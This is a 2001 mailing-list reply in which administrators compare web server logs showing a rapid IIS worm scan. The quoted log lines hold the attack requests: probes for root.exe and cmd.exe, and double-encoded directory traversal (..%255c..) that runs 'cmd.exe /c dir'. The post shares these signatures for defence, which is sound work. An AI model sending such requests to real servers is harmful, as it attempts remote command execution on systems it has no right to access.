Ron DuFresne wrote:
>
> Folks,
>
> Someone mentioned seeing similiar signatures in their logs earlier today
> to the signatures we are seeing in dramtic rapidity in a short time span.
> Are other sites seeing similiar signatures <quick greps attached and
> posted below> Has a new toy been unleshed, or is this an old toy we have
> not seen the signature for before:
>
> 208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir
>HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET /scripts/root.exe?/c+dir
>HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
>404 208
> 208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
>404 208
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
>249
There's lots of activity going on at Securityfocus, on the Incidents
list, and here's one snippit:
http://www.securityfocus.com/archive/75/214799
--
Patrick Benson
Stockholm, Sweden
_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls
